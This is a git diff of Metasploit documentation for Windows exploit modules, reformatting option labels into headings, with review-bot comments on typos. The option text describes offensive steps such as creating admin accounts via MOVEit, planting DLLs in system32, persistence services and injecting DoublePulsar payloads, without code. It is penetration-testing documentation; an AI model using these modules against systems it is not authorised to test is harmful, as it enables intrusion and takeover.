@@ -26,7 +26,7 @@ ## Options - **FILENAME** +### FILENAME The filename that the shellcode gets written to. Setting a filename is not required, as there is a default name already set. diff --git a/documentation/modules/exploit/windows/fileformat/cve_2017_8464_lnk_rce.md b/documentation/modules/exploit/windows/fileformat/cve_2017_8464_lnk_rce.md index 8cea0139fd203..42a2ea1582831 100644 --- a/documentation/modules/exploit/windows/fileformat/cve_2017_8464_lnk_rce.md +++ b/documentation/modules/exploit/windows/fileformat/cve_2017_8464_lnk_rce.md @@ -30,15 +30,15 @@ To set up the vulnerable environment, install a Windows version without the patc ## Options -**FILENAME** +### FILENAME The file name of the LNK file. This file name can be renamed later. If the value is not set, a random name will be generated. -**DLLNAME** +### DLLNAME The file name of the DLL file. This file cannot be renamed, as this will invalidate the LNK file(s). If not set, a random name will be generated. -**DRIVE** +### DRIVE Drive letter assigned to USB drive on victim's machine. If not set, LNK files for drive D till Z will be created. Copy all these LNK files to the USB drive to increase the chance that the vulnerability will be triggered. diff --git a/documentation/modules/exploit/windows/fileformat/documalis_pdf_editor_and_scanner.md b/documentation/modules/exploit/windows/fileformat/documalis_pdf_editor_and_scanner.md index aa7b48a355adc..cc480680094a2 100644 --- a/documentation/modules/exploit/windows/fileformat/documalis_pdf_editor_and_scanner.md +++ b/documentation/modules/exploit/windows/fileformat/documalis_pdf_editor_and_scanner.md @@ -27,7 +27,7 @@ Editor (depending on which software was exploited). ## Options - **FILENAME** +### FILENAME Name of the PDF file that Metasploit will generate. This will default to "msf.pdf", but can be changed. ## Scenarios 
diff --git a/documentation/modules/exploit/windows/fileformat/office_excel_slk.md b/documentation/modules/exploit/windows/fileformat/office_excel_slk.md index e0a0925a55dd6..ada271f5381d1 100644 --- a/documentation/modules/exploit/windows/fileformat/office_excel_slk.md +++ b/documentation/modules/exploit/windows/fileformat/office_excel_slk.md @@ -19,7 +19,7 @@ on the target. ## Options - **FILENAME** +### FILENAME The name of the generated .slk file. Default is a randomly generated file name. diff --git a/documentation/modules/exploit/windows/fileformat/winrar_ace.md b/documentation/modules/exploit/windows/fileformat/winrar_ace.md index 7f890f6f31bec..9349184f34f2a 100644 --- a/documentation/modules/exploit/windows/fileformat/winrar_ace.md +++ b/documentation/modules/exploit/windows/fileformat/winrar_ace.md @@ -23,13 +23,13 @@ This module will attempt to extract a payload to the startup folder of the curre ## Options -**FILENAME** +### FILENAME Filename to output. Default is `msf.ace`. Other extensions like `rar` and `zip` can be used as WinRAR parses files by their headers and not by extension. -**CUSTFILE** +### CUSTFILE Optional. Custom payload to use. Can be anything. Just be aware that some files are not *meant* to be executed in case you're wondering why the shellz ain't poppin'. -**FILE_LIST** +### FILE_LIST Optional. A list of other files to be included in the resulting ACE archive. The specified file must contain full paths to other files. Compression is NOT taking place. This can be used to make the output file seem more realistic. ## Examples diff --git a/documentation/modules/exploit/windows/fileformat/word_msdtjs_rce.md b/documentation/modules/exploit/windows/fileformat/word_msdtjs_rce.md index c129987031a55..040bea47c36df 100644 --- a/documentation/modules/exploit/windows/fileformat/word_msdtjs_rce.md +++ b/documentation/modules/exploit/windows/fileformat/word_msdtjs_rce.md 
@@ -33,15 +33,15 @@ Tested on Microsoft Windows 10 1909 with Microsoft Office Word 2016. ## Options -**CUSTOMTEMPLATE** +### CUSTOMTEMPLATE A DOCX file that will be used as a template to build the exploit. -**OBFUSCATE** +### OBFUSCATE Obfuscate JavaScript content. Default: true -**URIPATH** +### URIPATH The URI for the callback to get the payload. Testing suggests this must be ANSI compatible and the full URI must be less than 76 characters. ## Scenarios diff --git a/documentation/modules/exploit/windows/http/disk_pulse_enterprise_get.md b/documentation/modules/exploit/windows/http/disk_pulse_enterprise_get.md index ba68434a8f954..ef1c2b0b205af 100644 --- a/documentation/modules/exploit/windows/http/disk_pulse_enterprise_get.md +++ b/documentation/modules/exploit/windows/http/disk_pulse_enterprise_get.md @@ -17,11 +17,11 @@ ## Options - **RHOST** +### RHOST IP address of the remote host running the server. - **RPORT** +### RPORT Port that the web server is running on. Default is 80 but it can be changed when setting up the program or in the options. diff --git a/documentation/modules/exploit/windows/http/dnn_cookie_deserialization_rce.md b/documentation/modules/exploit/windows/http/dnn_cookie_deserialization_rce.md index c8b5cc81f4140..f028726d1753e 100644 --- a/documentation/modules/exploit/windows/http/dnn_cookie_deserialization_rce.md +++ b/documentation/modules/exploit/windows/http/dnn_cookie_deserialization_rce.md 
@@ -144,39 +144,39 @@ The expected structure includes a "type" attribute to instruct the server which ## Options - **DryRun** +### DryRun Set this to `true` to generate a payload, but not send the exploit to the target server. Default value is `false`. - **ENCRYPTED** +### ENCRYPTED Set this to `true` for targets running v9.1.1+. Default value is `false`. - **IV** +### IV The initialization vector to use for encrypting the payload. If specified along with `KEY`, `VERIFICATION_CODE` and `VERIFICATION_PLAIN` options will be ignored. - **KEY** +### KEY The key to use for encryption. If specified along with `IV`, `VERIFICATION_CODE` and `VERIFICATION_PLAIN` options will be ignored. - **SESSION_TOKEN** +### SESSION_TOKEN The .DOTNETNUKE session cookie value to use when submitting the payload to the server. Required for targets running v9.2.0+. - **SRVPORT** +### SRVPORT The server port to listen for HTTP callbacks on when testing encryption passphrases for targets running v9.2.2 - v9.3.0-RC. Default value is `8080` - **TARGETURI** +### TARGETURI Path to a page that will result in a DNN 404 Error Page. The default location is `/__` - **VERIFICATION_CODE** +### VERIFICATION_CODE The verification code received in an email, or the full path to a file containing multiple verification codes. - **VERIFICATION_PLAIN** +### VERIFICATION_PLAIN The known (full or partial) plaintext of the encrypted verification code. Typically in the format of {portalID}-{userID} where portalID is an integer and userID is either an integer (v9.1.1 - v9.2.1) or GUID (v9.2.2+). diff --git a/documentation/modules/exploit/windows/http/ektron_xslt_exec_ws.md b/documentation/modules/exploit/windows/http/ektron_xslt_exec_ws.md index 7e5d435e46a9b..e8fd2f706aff0 100644 --- a/documentation/modules/exploit/windows/http/ektron_xslt_exec_ws.md +++ b/documentation/modules/exploit/windows/http/ektron_xslt_exec_ws.md 
@@ -25,13 +25,13 @@ These are important but perhaps less-used options. There are quite a few other 'web' options available which will not be discussed due to their generality. - **TARGETOP** +### TARGETOP There are multiple operations which are vulnerable to this XSLT bug. We have enumerated more (likely all) of the operations in ServerControlWS.asmx and provide testers with the ability to test the additional operations by setting this option to one of the following: ContentBlockEx, GetContentFlaggingString,GetMessagingString, GetBookmarkString, GetContentRatingString This value defaults to ContentBlockEx (from the original reports). Testers may find adjusting this value useful if defenders have included Web Application Firewall (WAF) rules to specifically filter ContentBlockEx as a mitigation in lieu of updating. - **TARGETURI** +### TARGETURI This allows the tester to adjust the base-installation path. The default value is '/cms400min' but in our experience many deployments are simply the root path '/'. diff --git a/documentation/modules/exploit/windows/http/hp_imc_java_deserialize.md b/documentation/modules/exploit/windows/http/hp_imc_java_deserialize.md index de3349c3eea0a..e8b8d3a62321d 100644 --- a/documentation/modules/exploit/windows/http/hp_imc_java_deserialize.md +++ b/documentation/modules/exploit/windows/http/hp_imc_java_deserialize.md @@ -29,15 +29,15 @@ ## Options - **TARGETURI** +### TARGETURI Path to the IMC application, the default location is `/imc`. - **SSL** +### SSL As set up by default, IMC is vulnerable both over port `8080` and `8443` (SSL). Set this parameter to `true` and change `RPORT` if you'd like to exploit over SSL. - **RPORT** +### RPORT Set this to the appropriate port, `8080` (default) or `8443`. diff --git a/documentation/modules/exploit/windows/http/moveit_cve_2023_34362.md b/documentation/modules/exploit/windows/http/moveit_cve_2023_34362.md index 1959526401b48..da008fecb8d75 100644 
--- a/documentation/modules/exploit/windows/http/moveit_cve_2023_34362.md +++ b/documentation/modules/exploit/windows/http/moveit_cve_2023_34362.md @@ -24,11 +24,17 @@ https://www.ipswitch.com/forms/free-trials/moveit-transfer 4. After the installation completes, follow the instructions to create an admin user. ## Options -**LOGIN_NAME** (Required) Will be used as the login name for the system administrator created by the exploit. The default is random. +### LOGIN_NAME -**PASSWORD** (Required) Will be used as the password name for the system administrator created by the exploit. The default is random. +(Required) Will be used as the login name for the system administrator created by the exploit. The default is random. -**USERNAME** (Required) Will be used as the user name for the system administrator created by the exploit. The default is random. +### PASSWORD + +(Required) Will be used as the password name for the system administrator created by the exploit. The default is random. + +### USERNAME + +(Required) Will be used as the user name for the system administrator created by the exploit. The default is random. ## Verification Steps * Do: `msfconsole` diff --git a/documentation/modules/exploit/windows/http/octopusdeploy_deploy.md b/documentation/modules/exploit/windows/http/octopusdeploy_deploy.md index 57c286086495c..2af08bf4b37b2 100644 --- a/documentation/modules/exploit/windows/http/octopusdeploy_deploy.md +++ b/documentation/modules/exploit/windows/http/octopusdeploy_deploy.md 
@@ -19,27 +19,27 @@ ## Options - **APIKEY** +### APIKEY API key, which can be generated within the Octopus Deploy application. Can be used instead of a username/password combination. - **USERNAME** +### USERNAME Username of the Octopus Deploy user. - **PASSWORD** +### PASSWORD Password of the Octopus Deploy user. - **PATH** +### PATH Path to the Octopus Deploy instance. For example, if you sign in to "https://example.com/octopus/app", the value should be "/octopus". - **STEPNAME** +### STEPNAME Name of the step to be added to a deployment. This may be visible in the application for a short period of time. A random value will be generated if no value is provided. - **SSL** +### SSL Enables or disables SSL. Octopus Deploy server can be configured to listen for HTTP or HTTPS traffic. diff --git a/documentation/modules/exploit/windows/http/prtg_authenticated_rce.md b/documentation/modules/exploit/windows/http/prtg_authenticated_rce.md index 7a6aa5de1aa12..f70661651f8f5 100644 --- a/documentation/modules/exploit/windows/http/prtg_authenticated_rce.md +++ b/documentation/modules/exploit/windows/http/prtg_authenticated_rce.md @@ -42,15 +42,15 @@ PRTG Network Monitor is also available on the "Netmon" lab from Hack The Box, it In my experience steps 10-12 may require a few tries to work because notifications are queued up before execution on the server. Augmenting `WfsDelay` to 30 seconds did the trick, so it is set by default. ## Options -**ADMIN_USERNAME** +### ADMIN_USERNAME PRTG Network Monitor's account that has the right to create Notifications (allowed by default on the initial account). -**ADMIN_PASSWORD** +### ADMIN_PASSWORD The password associated with the specified username. -**VERBOSE** +### VERBOSE Setting `VERBOSE` to `true` displays the raw Powershell payload in console for manual testing. 
diff --git a/documentation/modules/exploit/windows/http/prtg_authenticated_rce_cve_2023_32781.md b/documentation/modules/exploit/windows/http/prtg_authenticated_rce_cve_2023_32781.md index 9afb99a7e1981..ecebf16c97b06 100644 --- a/documentation/modules/exploit/windows/http/prtg_authenticated_rce_cve_2023_32781.md +++ b/documentation/modules/exploit/windows/http/prtg_authenticated_rce_cve_2023_32781.md @@ -50,11 +50,11 @@ After running this you should have a meterpreter instance ## Options -**USERNAME** +### USERNAME PRTG Network Monitor's account that has the right to create Sensors (allowed by default on the initial account). -**PASSWORD** +### PASSWORD The password associated with the specified username. diff --git a/documentation/modules/exploit/windows/http/smartermail_rce.md b/documentation/modules/exploit/windows/http/smartermail_rce.md index 637b19dfac281..a9fb7d82884a5 100644 --- a/documentation/modules/exploit/windows/http/smartermail_rce.md +++ b/documentation/modules/exploit/windows/http/smartermail_rce.md @@ -56,10 +56,10 @@ Set Admin username and password to be `admin:admin` (or anything arbitrary) if p ### TARGET (Required) - 0. Target 0 (default) - Windows Command uses a default PowerShell payload to execute - code and open a Meterpreter session. However, any desired payload can be chosen. Choose with `set TARGET 0`. - 1. Target 1 - x86/x64 Windows CmdStager uses a CmdStager with default `vbs` stager flavor to execute code - and open a Meterpreter session. Choose with `set TARGET 1`. +0. Target 0 (default) - Windows Command uses a default PowerShell payload to execute +code and open a Meterpreter session. However, any desired payload can be chosen. Choose with `set TARGET 0`. +1. Target 1 - x86/x64 Windows CmdStager uses a CmdStager with default `vbs` stager flavor to execute code +and open a Meterpreter session. Choose with `set TARGET 1`. ### ENDPOINT (Required) 
diff --git a/documentation/modules/exploit/windows/local/cve_2020_0668_service_tracing.md b/documentation/modules/exploit/windows/local/cve_2020_0668_service_tracing.md index 5801b0ced4ce1..81acf408d45fd 100644 --- a/documentation/modules/exploit/windows/local/cve_2020_0668_service_tracing.md +++ b/documentation/modules/exploit/windows/local/cve_2020_0668_service_tracing.md @@ -83,21 +83,21 @@ The attack looks something like: ## Options - **EXPLOIT_DIR** +### EXPLOIT_DIR Directory to use for file upload and linking; this should not already exist. The directory cannot be deleted until after a reboot. - **OVERWRITE_DLL** +### OVERWRITE_DLL Overwrite WindowsCreDeviceInfo.dll if it exists (false by default). WindowsCoreDeviceInfo.dll is not present by default, but if it is present, it is likely loaded, so even with this set to true, the overwrite (and exploit) will fail. - **PAYLOAD_UPLOAD_NAME** +### PAYLOAD_UPLOAD_NAME The filename to use for the payload binary (%RAND% by default). This is the name of the dll payload when uploaded to the remote host. - **PHONEBOOK_UPLOAD_NAME** +### PHONEBOOK_UPLOAD_NAME The name of the phonebook file to trigger RASDIAL (%RAND% by default). The rasdialer trigger requires a config file; this is the name of the xml file required to trigger the RAST service. diff --git a/documentation/modules/exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move.md b/documentation/modules/exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move.md index 51631ddbaa960..db53be0e222c9 100644 --- a/documentation/modules/exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move.md +++ b/documentation/modules/exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move.md 
@@ -35,13 +35,13 @@ vulnerability. 7. You should get a shell running as SYSTEM a few seconds after the `JOB_WAIT_TIME` timer expires. ## Options - **OVERWRITE_DLL** +### OVERWRITE_DLL Overwrite WindowsCreDeviceInfo.dll if it exists (false by default). WindowsCoreDeviceInfo.dll is not present by default, but if it is present, it is likely loaded, so even with this set to true, the overwrite (and exploit) will likely end up failing. - **JOB_WAIT_TIME** +### JOB_WAIT_TIME Amount of time, in seconds, to wait for CVE-2020-0787.x64.dll or CVE-2020-0787.x86.dll to finish running before attempting to load uso_trigger.x86.dll or uso_trigger.x64.dll to conduct the local privilege elevation. The main reason for configuring this option is diff --git a/documentation/modules/exploit/windows/local/cve_2020_1048_printerdemon.md b/documentation/modules/exploit/windows/local/cve_2020_1048_printerdemon.md index 85f40114c7055..0274581d5b3c4 100644 --- a/documentation/modules/exploit/windows/local/cve_2020_1048_printerdemon.md +++ b/documentation/modules/exploit/windows/local/cve_2020_1048_printerdemon.md 
@@ -40,31 +40,31 @@ to work. ## Options - **EXECUTE_DELAY** +### EXECUTE_DELAY The time between uploading and running the exploit. Default is 3 seconds, but high-latency networks may require more time. - **EXPLOIT_NAME** +### EXPLOIT_NAME The name of the when it is uploaded to the target (%RAND% by default). - **EXPLOIT_DIR** +### EXPLOIT_DIR Directory to use for file upload and linking; this should not already exist. (%RAND% by default) - **OVERWRITE_DLL** +### OVERWRITE_DLL The remote location you would like to write to. Default is ```C:\windows\system32\ualapi.dll``` - **PAYLOAD_NAME** +### PAYLOAD_NAME The filename to use for the payload binary (%RAND% by default). This is the name of the dll payload when uploaded to the remote host. - **RESTART_TARGET** +### RESTART_TARGET This will restart the target to force the overwrite. YOU WILL LOSE YOUR SESSION unless you have a method of persistence. The dll will not be run until a second reboot. - **WRITEABLE_DIR** +### WRITEABLE_DIR The directory to use the payload binary and uploaded payload. (%RAND% by default). diff --git a/documentation/modules/exploit/windows/local/cve_2020_1313_system_orchestrator.md b/documentation/modules/exploit/windows/local/cve_2020_1313_system_orchestrator.md index 911f517071b7a..9ff40913c9ec4 100644 --- a/documentation/modules/exploit/windows/local/cve_2020_1313_system_orchestrator.md +++ b/documentation/modules/exploit/windows/local/cve_2020_1313_system_orchestrator.md 
@@ -33,20 +33,20 @@ Where `x` is a numeric key assigned to the job. ## Options - **EXECUTE_DELAY** +### EXECUTE_DELAY The number of seconds to sleep after uploading the exploit and launching it. - **EXPLOIT_NAME** +### EXPLOIT_NAME The name of the exploit EXE as it will appear on target - **EXPLOIT_TIMEOUT** +### EXPLOIT_TIMEOUT The maximum time to wait for a response from the exploit binary. - **PAYLOAD_NAME** +### PAYLOAD_NAME The name of the payload EXE as it will appear on target - **WRITABLE_DIR** +### WRITABLE_DIR Directory to use for file upload and linking; this should not already exist. This directory will require manual cleanup. diff --git a/documentation/modules/exploit/windows/local/cve_2020_1337_printerdemon.md b/documentation/modules/exploit/windows/local/cve_2020_1337_printerdemon.md index beea8dd3c64d2..2d65af6cfa962 100644 --- a/documentation/modules/exploit/windows/local/cve_2020_1337_printerdemon.md +++ b/documentation/modules/exploit/windows/local/cve_2020_1337_printerdemon.md @@ -51,27 +51,27 @@ Verify you get a session ## Options - **DESTINATION_FILE** +### DESTINATION_FILE The remote file you would like to write to. Default is ```ualapi.dll``` - **DESTINATION_PATH** +### DESTINATION_PATH The remote location of the file you would like to write to. Default is ```C:\windows\system32\``` - **JUNCTION_PATH** +### JUNCTION_PATH Path to use as a juntion point. It should be nonexistent/empty. Default is ```%TEMP%/%RAND%``` - **PRINTER_NAME** +### PRINTER_NAME The printer name to use. Default is %RAND%. - **RESTART_TARGET** +### RESTART_TARGET This will restart the target to force the overwrite. YOU WILL LOSE YOUR SESSION unless you have a method of persistence. The dll will not be run until a second reboot. - **SESSION** +### SESSION The session to target ## Scenarios diff --git a/documentation/modules/exploit/windows/local/panda_psevents.md b/documentation/modules/exploit/windows/local/panda_psevents.md index eb84dd92153af..ce23080763686 100644 
--- a/documentation/modules/exploit/windows/local/panda_psevents.md +++ b/documentation/modules/exploit/windows/local/panda_psevents.md @@ -25,7 +25,7 @@ ## Options - **DLL** +### DLL Which DLL to name our payload. The original vulnerability writeup utilized bcryptPrimitives.dll, and mentioned several others that could be used. However the dll seems to be VERY picky. Default is cryptnet.dll. See the chart for more details. @@ -39,7 +39,7 @@ In this chart, `CRASH` means PSEvents.exe crashed on the system. `NO` means PSEvents didn't crash, but no session was obtained. `valid` means we got a shell. - **ListenerTimeout** +### ListenerTimeout How long to wait for a shell. PSEvents.exe runs every hour or so, so the default is 3610 (10sec to account for code execution or other things) diff --git a/documentation/modules/exploit/windows/local/persistence_service.md b/documentation/modules/exploit/windows/local/persistence_service.md index 03132b662a9f2..26c4b4e0a1a30 100644 --- a/documentation/modules/exploit/windows/local/persistence_service.md +++ b/documentation/modules/exploit/windows/local/persistence_service.md @@ -5,23 +5,23 @@ It will create a new service which will start the payload whenever the service i ## Options - **REMOTE_EXE_NAME** +### REMOTE_EXE_NAME The remote victim name. Random string as default. - **REMOTE_EXE_PATH** +### REMOTE_EXE_PATH The remote victim exe path to run. Use temp directory as default. - **RETRY_TIME** +### RETRY_TIME The retry time that shell connect failed. 5 seconds as default. - **SERVICE_DESCRIPTION** +### SERVICE_DESCRIPTION The description of service. Random string as default. - **SERVICE_NAME** +### SERVICE_NAME The name of service. Random string as default. diff --git a/documentation/modules/exploit/windows/local/plantronics_hub_spokesupdateservice_privesc.md b/documentation/modules/exploit/windows/local/plantronics_hub_spokesupdateservice_privesc.md index 72ba06b84a09a..ac297cc2b0245 100644 
--- a/documentation/modules/exploit/windows/local/plantronics_hub_spokesupdateservice_privesc.md +++ b/documentation/modules/exploit/windows/local/plantronics_hub_spokesupdateservice_privesc.md @@ -24,11 +24,11 @@ ## Options - **SESSION** +### SESSION Which session to use, which can be viewed with `sessions` - **WritableDir** +### WritableDir A writable directory file system path. (default: `%TEMP%`) diff --git a/documentation/modules/exploit/windows/local/tokenmagic.md b/documentation/modules/exploit/windows/local/tokenmagic.md index 0eaf68bc6de11..ff329b6157557 100644 --- a/documentation/modules/exploit/windows/local/tokenmagic.md +++ b/documentation/modules/exploit/windows/local/tokenmagic.md @@ -27,21 +27,21 @@ the powershell script manually after some edits to accomplish access to a Window 7. You should get a shell, the exploitation process should be fairly instantaneous ## Options - **METHOD** +### METHOD Select between DLL hijacking and service exploitation * DLL mode: Using the elevated privileges from token magic the module will write a malicious file to `c:\windows\system32\windowscoredeviceinfo.dll`, a temporary host process is spawned and a DLL trigger is injected into the process to call the `usoclient`. When the `usoclient` EXE runs it loads the malicious DLL `windowscoredeviceinfo.dll` with `SYSTEM` level privileges. * SERVICE mode: Using the elevated privileges from token magic the module, create a malicious service, and then start it with `SYSTEM` level privileges - **SERVICE_FILENAME** +### SERVICE_FILENAME Filename for Service Payload (Random by default). - **SERVICE_NAME** +### SERVICE_NAME Service Name to use (Random by default). - **SESSION** +### SESSION The session to run this module on. - **WRITABLE_DIR** +### WRITABLE_DIR Directory to write file to (`%TEMP%` by default). ## Scenarios 
diff --git a/documentation/modules/exploit/windows/local/windscribe_windscribeservice_priv_esc.md b/documentation/modules/exploit/windows/local/windscribe_windscribeservice_priv_esc.md index 3bf7fa57746df..e0009554322d6 100644 --- a/documentation/modules/exploit/windows/local/windscribe_windscribeservice_priv_esc.md +++ b/documentation/modules/exploit/windows/local/windscribe_windscribeservice_priv_esc.md @@ -33,11 +33,11 @@ ## Options - **SESSION** +### SESSION Which session to use, which can be viewed with `sessions` - **WritableDir** +### WritableDir A writable directory file system path. (default: `%TEMP%`) diff --git a/documentation/modules/exploit/windows/misc/gh0st.md b/documentation/modules/exploit/windows/misc/gh0st.md index a86b89736d30f..d424cac8ee430 100644 --- a/documentation/modules/exploit/windows/misc/gh0st.md +++ b/documentation/modules/exploit/windows/misc/gh0st.md @@ -16,7 +16,7 @@ ## Options - **MAGIC** +### MAGIC This is the 5 character magic used by the server. The default is `Gh0st` diff --git a/documentation/modules/exploit/windows/rdp/rdp_doublepulsar_rce.md b/documentation/modules/exploit/windows/rdp/rdp_doublepulsar_rce.md index 805b37bf14412..bee58dcfacad3 100644 --- a/documentation/modules/exploit/windows/rdp/rdp_doublepulsar_rce.md +++ b/documentation/modules/exploit/windows/rdp/rdp_doublepulsar_rce.md @@ -17,12 +17,12 @@ Id Name ## Options -**DefangedMode** +### DefangedMode Set this to `false` to disable defanged mode and enable module functionality. Set this only if you're SURE you want to proceed. -**ProcessName** +### ProcessName Set this to the userland process you want to inject the payload into. Defaults to `spoolsv.exe`. diff --git a/documentation/modules/exploit/windows/smb/group_policy_startup.md b/documentation/modules/exploit/windows/smb/group_policy_startup.md index 0e55ab010ce55..69a41ca56a469 100644 --- a/documentation/modules/exploit/windows/smb/group_policy_startup.md 
+++ b/documentation/modules/exploit/windows/smb/group_policy_startup.md @@ -17,15 +17,15 @@ More information available at [Gotham Digital Science Security](https://blog.gds ## Options - **FILE_NAME** +### FILE_NAME VBS File name to share (Default: random .vbs) - **FOLDER_NAME** +### FOLDER_NAME Folder name to share (Default: none) - **SHARE** +### SHARE Share name (Default: Random) diff --git a/documentation/modules/exploit/windows/smb/ms17_010_psexec.md b/documentation/modules/exploit/windows/smb/ms17_010_psexec.md index ac661c826fbc7..259d4152a78e6 100644 --- a/documentation/modules/exploit/windows/smb/ms17_010_psexec.md +++ b/documentation/modules/exploit/windows/smb/ms17_010_psexec.md @@ -39,23 +39,23 @@ msf exploit(psexec) > exploit By default, using exploit/windows/smb/ms17_010_psexec can be as simple as setting the RHOST option, and you're ready to go. -**The NAMEDPIPE Option** +### NAMEDPIPE By default, the module will scan for a list of common pipes for any available one. You can specify one by name. -**The LEAKATTEMPTS Option** +### LEAKATTEMPTS Information leaks are used to ensure stability of the exploit. Sometimes they don't pop on the first try. -**The DBGTRACE Option** +### DBGTRACE Used to debug, gives extremely verbose information. -**The SMBUser Option** +### SMBUser This is a valid Windows username. -**The SMBPass option** +### SMBPass This can be either the plain text version or the Windows hash. diff --git a/documentation/modules/exploit/windows/smb/psexec.md b/documentation/modules/exploit/windows/smb/psexec.md index 8516d4799532b..284d44a05a625 100644 --- a/documentation/modules/exploit/windows/smb/psexec.md +++ b/documentation/modules/exploit/windows/smb/psexec.md 
@@ -53,11 +53,11 @@ meterpreter > By default, using exploit/windows/smb/psexec can be as simple as setting the RHOST option, and you're ready to go. But in reality, you will probably need to at least configure: -**The SMBUser Option** +### SMBUser This is a valid Windows username. -**The SMBPass option** +### SMBPass This can be either the plain text version or the Windows hash. diff --git a/documentation/modules/exploit/windows/smb/smb_doublepulsar_rce.md b/documentation/modules/exploit/windows/smb/smb_doublepulsar_rce.md index a2224899bf602..37b23c030f186 100644 --- a/documentation/modules/exploit/windows/smb/smb_doublepulsar_rce.md +++ b/documentation/modules/exploit/windows/smb/smb_doublepulsar_rce.md @@ -17,12 +17,12 @@ Id Name ## Options -**DefangedMode** +### DefangedMode Set this to `false` to disable defanged mode and enable module functionality. Set this only if you're SURE you want to proceed. -**ProcessName** +### ProcessName Set this to the userland process you want to inject the payload into. Defaults to `spoolsv.exe`.
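Review bot: "password name" in the PASSWORD paragraph of the moveit_cve_2023_34362.md hunk is a typo carried over from the old one-line form; since the sentence is being moved onto its own line anyway, fix it at the same time: "(Required) Will be used as the password for the system administrator created by the exploit."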
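Review bot: The OVERWRITE_DLL paragraph in the cve_2020_0668_service_tracing.md hunk spells the file two ways, "WindowsCreDeviceInfo.dll" in the first sentence and "WindowsCoreDeviceInfo.dll" in the second (the tokenmagic.md hunk uses `windowscoredeviceinfo.dll`); the identical sentence is in the cve_2020_0787_bits_arbitrary_file_move.md hunk. Use the "Core" spelling in both, in backticks as a filename. In the same 0668 hunk, "the RAST service" in the PHONEBOOK_UPLOAD_NAME text looks like a typo for the RAS service mentioned alongside RASDIAL; worth confirming while the section is being touched.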
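Review bot: In the cve_2020_1048_printerdemon.md hunk the EXPLOIT_NAME description "The name of the when it is uploaded to the target" is missing its noun (compare the same option in the cve_2020_1313_system_orchestrator.md hunk: "The name of the exploit EXE as it will appear on target"), and the WRITEABLE_DIR text "The directory to use the payload binary and uploaded payload" also reads incomplete. The default path `C:\windows\system32\ualapi.dll` is wrapped in triple backticks inline; single backticks are the convention everywhere else in this patch. The option is also spelled WRITEABLE_DIR here but WRITABLE_DIR in the cve_2020_1313 and tokenmagic hunks; now that these names are headings, each should be checked against the option name the module actually registers.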
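Review bot: "juntion point" in the JUNCTION_PATH paragraph of the cve_2020_1337_printerdemon.md hunk should be "junction point", and the three default values in that hunk (`ualapi.dll`, `C:\windows\system32\`, `%TEMP%/%RAND%`) are wrapped in triple backticks inline where the rest of the docs use single backticks.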
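Review bot: The TARGETOP operation list in the ektron_xslt_exec_ws.md hunk is missing a space in "GetContentFlaggingString,GetMessagingString"; since the section is being reformatted, consider putting the five operation names and the default `ContentBlockEx` in inline code so they read as literal option values.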
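Review bot: The smartermail_rce.md hunk removes the indentation from the two TARGET list items, but the wrapped continuation lines ("code and open a Meterpreter session..." and "and open a Meterpreter session...") are now flush left and only stay inside their list item through lazy continuation; indenting them by three spaces keeps the rendering unambiguous. Starting the ordered list at 0 is fine, GFM honors the start number.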
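Review bot: In the persistence_service.md hunk the option descriptions are ungrammatical now that each sits under its own heading: "The remote victim name" (REMOTE_EXE_NAME) should say it is the file name of the payload on the victim, and "The retry time that shell connect failed. 5 seconds as default." would read better as "Seconds to wait before retrying when the shell connection fails. Default is 5."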
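Review bot: The SERVICE mode bullet under METHOD in the tokenmagic.md hunk has a misplaced comma: "Using the elevated privileges from token magic the module, create a malicious service, and then start it with `SYSTEM` level privileges". Suggest "Using the elevated privileges from token magic, the module creates a malicious service and then starts it with `SYSTEM` level privileges", matching the phrasing of the DLL mode bullet above it.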